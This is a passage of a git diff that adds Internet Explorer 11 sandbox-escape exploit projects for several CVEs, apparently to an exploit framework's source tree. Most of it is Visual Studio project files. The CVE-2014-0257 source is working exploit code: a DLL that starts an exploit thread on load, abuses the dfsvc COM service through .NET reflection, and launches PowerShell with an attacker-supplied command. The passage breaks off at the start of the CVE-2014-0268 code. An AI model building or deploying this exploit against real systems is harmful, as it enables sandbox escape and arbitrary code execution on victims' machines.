+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+      <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+      <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+      <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+      <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClInclude Include="stdafx.h" />
+    <ClInclude Include="targetver.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="CVE-2013-5046.cpp" />
+    <ClCompile Include="dllmain.cpp">
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged>
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+      </PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+      </PrecompiledHeader>
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged>
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+      </PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+      </PrecompiledHeader>
+    </ClCompile>
+    <ClCompile Include="stdafx.cpp">
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
+    </ClCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <ProjectReference Include="..\CommonUtils\CommonUtils.vcxproj">
+      <Project>{04dde547-bb65-4c0c-b80b-231df42c7a1d}</Project>
+    </ProjectReference>
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>
\ No newline at end of file
diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/dllmain.cpp b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/dllmain.cpp
new file mode 100755
index 0000000000..042cf2c7c4
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/dllmain.cpp
@@ -0,0 +1,23 @@
+// dllmain.cpp : Defines the entry point for the DLL application.
+#include "stdafx.h"
+
+DWORD CALLBACK ExploitThread(LPVOID hModule);
+
+BOOL APIENTRY DllMain( HMODULE hModule,
+                       DWORD  ul_reason_for_call,
+                       LPVOID lpReserved
+					 )
+{
+	switch (ul_reason_for_call)
+	{
+	case DLL_PROCESS_ATTACH:
+		CreateThread(nullptr, 0, ExploitThread, hModule, 0, 0);
+		break;
+	case DLL_THREAD_ATTACH:
+	case DLL_THREAD_DETACH:
+	case DLL_PROCESS_DETACH:
+		break;
+	}
+	return TRUE;
+}
+
diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/stdafx.cpp b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/stdafx.cpp
new file mode 100755
index 0000000000..11763c77a3
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/stdafx.cpp
@@ -0,0 +1,8 @@
+// stdafx.cpp : source file that includes just the standard includes
+// CVE-2014-0268.pch will be the pre-compiled header
+// stdafx.obj will contain the pre-compiled type information
+
+#include "stdafx.h"
+
+// TODO: reference any additional headers you need in STDAFX.H
+// and not in this file
diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/stdafx.h b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/stdafx.h
new file mode 100755
index 0000000000..3ec4541276
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/stdafx.h
@@ -0,0 +1,12 @@
+// stdafx.h : include file for standard system include files,
+// or project specific include files that are used frequently, but
+// are changed infrequently
+//
+
+#pragma once
+
+#include "targetver.h"
+
+#include <windows.h>
+#include <Utils.h>
+#include "interfaces.h"
\ No newline at end of file
diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/targetver.h b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/targetver.h
new file mode 100755
index 0000000000..87c0086de7
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/targetver.h
@@ -0,0 +1,8 @@
+#pragma once
+
+// Including SDKDDKVer.h defines the highest available Windows platform.
+
+// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
+// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
+
+#include <SDKDDKVer.h>
diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp
new file mode 100755
index 0000000000..8166284000
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp
@@ -0,0 +1,201 @@
+// This file is part of IE11SandboxEsacapes.
+
+// IE11SandboxEscapes is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+
+// IE11SandboxEscapes is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+// GNU General Public License for more details.
+
+// You should have received a copy of the GNU General Public License
+// along with IE11SandboxEscapes.  If not, see <http://www.gnu.org/licenses/>.
+
+#include "stdafx.h"
+
+#define MAX_ENV 32767
+
+#import <mscorlib.tlb> rename("ReportEvent", "_ReportEvent")
+
+const wchar_t CLSID_DFSVC[] = L"{20FD4E26-8E0F-4F73-A0E0-F27B8C57BE6F}";
+
+long GetSafeArrayLen(LPSAFEARRAY psa)
+{
+	long ubound = 0;
+
+	SafeArrayGetUBound(psa, 1, &ubound);
+
+	return ubound + 1;
+}
+
+mscorlib::_MethodInfoPtr GetStaticMethod(mscorlib::_TypePtr type, LPCWSTR findName, int pcount)
+{
+	LPSAFEARRAY methods = type->GetMethods_2();
+	mscorlib::_MethodInfoPtr ret;
+	LONG methodCount = GetSafeArrayLen(methods);
+
+	for (long i = 0; i < methodCount; ++i)
+	{
+		IUnknown* v = nullptr;
+
+		if (SUCCEEDED(SafeArrayGetElement(methods, &i, &v)))
+		{
+			mscorlib::_MethodInfoPtr method = v;
+
+			bstr_t name = method->Getname();
+			LPSAFEARRAY params = method->GetParameters();
+			long paramCount = GetSafeArrayLen(params);
+
+			if (method->IsStatic && wcscmp(name.GetBSTR(), findName) == 0 && paramCount == pcount)
+			{
+				ret = method;
+				break;
+			}
+		}
+	}
+
+	SafeArrayDestroy(methods);
+
+	return ret;
+}
+
+template<typename T> T ExecuteMethod(mscorlib::_MethodInfoPtr method, std::vector<variant_t>& args)
+{
+	variant_t obj;
+	T retObj;
+
+	SAFEARRAY * psa;
+	SAFEARRAYBOUND rgsabound[1];
+
+	rgsabound[0].lLbound = 0;
+	rgsabound[0].cElements = (ULONG)args.size();
+	psa = SafeArrayCreate(VT_VARIANT, 1, rgsabound);
+
+	for (LONG indicies = 0; indicies < (LONG)args.size(); ++indicies)
+	{
+		SafeArrayPutElement(psa, &indicies, &args[indicies]);
+	}
+
+	variant_t ret = method->Invoke_3(obj, psa);
+
+	if ((ret.vt == VT_UNKNOWN) || (ret.vt == VT_DISPATCH))
+	{
+		retObj = ret.punkVal;
+	}
+
+	SafeArrayDestroy(psa);
+
+	return retObj;
+}
+
+bstr_t GetEnv(LPWSTR env)
+{
+	WCHAR buf[MAX_ENV];
+
+	GetEnvironmentVariable(env, buf, MAX_ENV);
+
+	return buf;
+}
+
+void DoDfsvcExploit()
+{
+	CLSID clsid;
+
+	CLSIDFromString(CLSID_DFSVC, &clsid);
+
+	DebugPrintf("Starting DFSVC Exploit\n");
+
+	mscorlib::_ObjectPtr obj;
+
+	HRESULT hr = CoCreateInstance(clsid, nullptr, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&obj));
+
+	if (FAILED(hr))
+	{
+		WCHAR cmdline[] = L"dfsvc.exe";
+
+		STARTUPINFO startInfo = { 0 };
+		PROCESS_INFORMATION procInfo = { 0 };
+
+		// Start dfsvc (because we can due to the ElevationPolicy)
+		if (CreateProcess(GetEnv(L"windir") + L"\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe", cmdline,
+			nullptr, nullptr, FALSE, 0, nullptr, nullptr, &startInfo, &procInfo))
+		{
+			CloseHandle(procInfo.hProcess);
+			CloseHandle(procInfo.hThread);
+
+			// Just sleep to ensure it comes up
+			Sleep(4000);
+			hr = CoCreateInstance(clsid, nullptr, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&obj));
+		}
+		else
+		{
+			DebugPrintf("Couldn't create service %d\n", GetLastError());
+		}
+	}
+
+	if (SUCCEEDED(hr))
+	{
+		try
+		{
+			mscorlib::_TypePtr type = obj->GetType();
+
+			// Get type of Type (note defaults to RuntimeType then TypeInfo)
+			type = type->GetType()->BaseType->BaseType;
+
+			DebugPrintf("TypeName: %ls", type->FullName.GetBSTR());
+
+			mscorlib::_MethodInfoPtr getTypeMethod = GetStaticMethod(type, L"GetType", 1);
+
+			DebugPrintf("getTypeMethod: %p", (void*)getTypeMethod);
+
+			std::vector<variant_t> getTypeArgs;
+
+			getTypeArgs.push_back(L"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089");
+
+			// Get process type
+			type = ExecuteMethod<mscorlib::_TypePtr>(getTypeMethod, getTypeArgs);
+
+			if (type)
+			{
+				mscorlib::_MethodInfoPtr startMethod = GetStaticMethod(type, L"Start", 2);
+
+				if (startMethod)
+				{
+					std::vector<variant_t> startArgs;
+
+					startArgs.push_back(L"powershell");
+					startArgs.push_back(GetEnv(L"PSHCMD"));
+
+					ExecuteMethod<mscorlib::_ObjectPtr>(startMethod, startArgs);
+				}
+				else
+				{
+					DebugPrintf("Couldn't find Start method");
+				}
+			}
+			else
+			{
+				DebugPrintf("Couldn't find Process Type");
+			}
+		}
+		catch (_com_error e)
+		{
+			DebugPrintf("COM Error: %ls\n", e.ErrorMessage());
+		}
+	}
+	else
+	{
+		DebugPrintf("Error get dfsvc IUnknown: %08X\n", hr);
+	}
+}
+
+DWORD CALLBACK ExploitThread(LPVOID hModule)
+{
+	CoInitialize(nullptr);
+	DoDfsvcExploit();
+	CoUninitialize();
+
+	FreeLibraryAndExitThread((HMODULE)hModule, 0);
+}
\ No newline at end of file
diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.vcxproj b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.vcxproj
new file mode 100755
index 0000000000..2c9db40e6f
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.vcxproj
@@ -0,0 +1,182 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{2A46841E-E3FC-42FF-BCDF-70F76E757E26}</ProjectGuid>
+    <Keyword>Win32Proj</Keyword>
+    <RootNamespace>CVE20140268</RootNamespace>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+      <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+      <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+      <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+      <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClInclude Include="stdafx.h" />
+    <ClInclude Include="targetver.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="CVE-2014-0257.cpp" />
+    <ClCompile Include="dllmain.cpp">
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged>
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+      </PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+      </PrecompiledHeader>
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged>
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+      </PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+      </PrecompiledHeader>
+    </ClCompile>
+    <ClCompile Include="stdafx.cpp">
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
+    </ClCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <ProjectReference Include="..\CommonUtils\CommonUtils.vcxproj">
+      <Project>{04dde547-bb65-4c0c-b80b-231df42c7a1d}</Project>
+    </ProjectReference>
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>
\ No newline at end of file
diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/dllmain.cpp b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/dllmain.cpp
new file mode 100755
index 0000000000..9eb281e8a8
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/dllmain.cpp
@@ -0,0 +1,23 @@
+// dllmain.cpp : Defines the entry point for the DLL application.
+#include "stdafx.h"
+
+DWORD CALLBACK ExploitThread(LPVOID hModule);
+
+BOOL APIENTRY DllMain( HMODULE hModule,
+                       DWORD  ul_reason_for_call,
+                       LPVOID lpReserved
+					 )
+{
+	switch (ul_reason_for_call)
+	{
+	case DLL_PROCESS_ATTACH:		
+		CreateThread(nullptr, 0, ExploitThread, hModule, 0, 0);
+		break;
+	case DLL_THREAD_ATTACH:
+	case DLL_THREAD_DETACH:
+	case DLL_PROCESS_DETACH:
+		break;
+	}
+	return TRUE;
+}
+
diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/stdafx.cpp b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/stdafx.cpp
new file mode 100755
index 0000000000..11763c77a3
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/stdafx.cpp
@@ -0,0 +1,8 @@
+// stdafx.cpp : source file that includes just the standard includes
+// CVE-2014-0268.pch will be the pre-compiled header
+// stdafx.obj will contain the pre-compiled type information
+
+#include "stdafx.h"
+
+// TODO: reference any additional headers you need in STDAFX.H
+// and not in this file
diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/stdafx.h b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/stdafx.h
new file mode 100755
index 0000000000..562cb0adb0
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/stdafx.h
@@ -0,0 +1,11 @@
+// stdafx.h : include file for standard system include files,
+// or project specific include files that are used frequently, but
+// are changed infrequently
+//
+
+#pragma once
+
+#include "targetver.h"
+
+#include <windows.h>
+#include <Utils.h>
diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/targetver.h b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/targetver.h
new file mode 100755
index 0000000000..87c0086de7
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/targetver.h
@@ -0,0 +1,8 @@
+#pragma once
+
+// Including SDKDDKVer.h defines the highest available Windows platform.
+
+// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
+// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
+
+#include <SDKDDKVer.h>
diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/CVE-2014-0268.cpp b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/CVE-2014-0268.cpp
new file mode 100755
index 0000000000..f4be2a5997
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/CVE-2014-0268.cpp
@@ -0,0 +1,81 @@
+// This file is part of IE11SandboxEsacapes.
+
+// IE11SandboxEscapes is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+
+// IE11SandboxEscapes is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+// GNU General Public License for more details.
+
+// You should have received a copy of the GNU General Public License
+// along with IE11SandboxEscapes.  If not, see <http://www.gnu.org/licenses/>.
+
+#include "stdafx.h"
+#include <Utils.h>
+#include <Shlwapi.h>
+#include <Exdisp.h>
+
+_COM_SMARTPTR_TYPEDEF(IWebBrowser2, __uuidof(IWebBrowser2));
+
+void DoSetAttachmentUserOverride()
+{
+	IShdocvwBroker* shdocvw = nullptr;
+
